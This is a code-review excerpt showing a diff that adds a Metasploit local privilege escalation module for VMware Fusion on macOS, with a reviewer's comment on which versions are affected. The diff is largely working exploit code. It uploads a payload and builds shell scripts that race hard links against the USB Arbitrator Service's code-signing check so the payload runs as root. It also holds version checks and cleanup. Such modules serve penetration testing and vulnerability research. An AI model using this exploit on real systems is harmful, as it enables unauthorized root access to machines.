modules/exploits/osx/local/vmware_fusion_lpe.rb

```diff
@@ -0,0 +1,213 @@
+
+    print_status 'Starting USB Service (5 sec pause)'
+    cmd_exec "cd #{link_folder}; '#{link_folder}/#{open_usb_service}' &"
+    Rex.sleep 5 # give time for the service to execute our payload
+    print_status 'Killing service'
+    cmd_exec "pkill '#{open_usb_service}'"
+    print_status "Deleting #{root_link_folder}"
+    rm_rf root_link_folder
+  end
+
+  def exactly_11_5_3
+    # Upload payload executable & chmod
+    payload_name = "#{base_dir}#{rand_text_alphanumeric(5..10)}"
+    print_status "Uploading Payload to #{payload_name}"
+    write_file "#{payload_name}", generate_payload_exe
+    chmod "#{payload_name}", 0755
+    register_file_for_cleanup "#{base_dir}VMware USB Arbitrator Service"
+    #create race with codesign check
+    root_link_folder = "#{get_home_dir}/#{rand_text_alphanumeric(2..5)}" # for cleanup later
+    link_folder = "#{root_link_folder}/#{rand_text_alphanumeric(2..5)}/#{rand_text_alphanumeric(2..5)}/"
+    print_status 'Uploading race condition executable.'
+    race = []
+    race << '#!/bin/sh'
+    race << 'while [ "1" = "1" ]; do'
+    race << "    ln -f '/Applications/VMware Fusion.app/Contents/Library/services/#{usb_service}' '#{base_dir}#{usb_service}'"
+    race << "    ln -f '#{payload_name}' '#{base_dir}#{usb_service}'"
+    race << 'done'
+    race = race.join("\n")
+    racer_name = "#{base_dir}#{rand_text_alphanumeric(5..10)}"
+    upload_and_chmodx racer_name, race
+    register_file_for_cleanup racer_name
+    # create the hard link
+    print_status "Creating folder (#{link_folder}) and link"
+    cmd_exec "mkdir -p #{link_folder}"
+    cmd_exec "ln '/Applications/VMware Fusion.app/Contents/Library/services/#{open_usb_service}' '#{link_folder}#{open_usb_service}'"
+
+    # create the launcher to start the racer and keep launching our service to attempt to win
+    launcher = []
+    launcher << '#!/bin/sh'
+    launcher << "#{racer_name} &"
+    launcher << "for i in {1..#{datastore['MAXATTEMPTS']}}"
+    launcher << 'do'
+    launcher << '    echo "attempt $i";'
+    launcher << "    '#{link_folder}#{open_usb_service}'"
+    launcher << 'done'
+    launcher = launcher.join("\n")
+    runner_name = "#{base_dir}#{rand_text_alphanumeric(5..10)}"
+    upload_and_chmodx runner_name, launcher
+    register_file_for_cleanup runner_name
+
+    print_status "Launching Exploit #{runner_name}"
+    results = cmd_exec "#{runner_name} &"
+    vprint_status results
+
+    print_status 'Exploit Finished, killing scripts.'
+    cmd_exec "pkill #{racer_name}"
+    cmd_exec "pkill #{runner_name}" # in theory should be killed already but just in case
+    rm_rf base_dir
+  end
+
+  def check
+    unless exists? "/Applications/VMware Fusion.app/Contents/Library/services/#{open_usb_service}"
+      print_bad "'#{open_usb_service}' binary missing"
+      return CheckCode::Safe
+    end
+    version = get_version
+    if version.between?(Gem::Version.new('11.5.0'), Gem::Version.new('11.5.3'))
```

Comment:
Actually, it's been vulnerable way before 11.5.0. The earliest version I tested was VMware Fusion 10.1.3 (9472307) on macOS 10.13.6. See GRIMM's [NotQuite0DayFriday exploit notes](https://github.com/grimm-co/NotQuite0DayFriday/blob/master/2020.03.17-vmware-fusion/notes.txt#L7) for the versions I tested.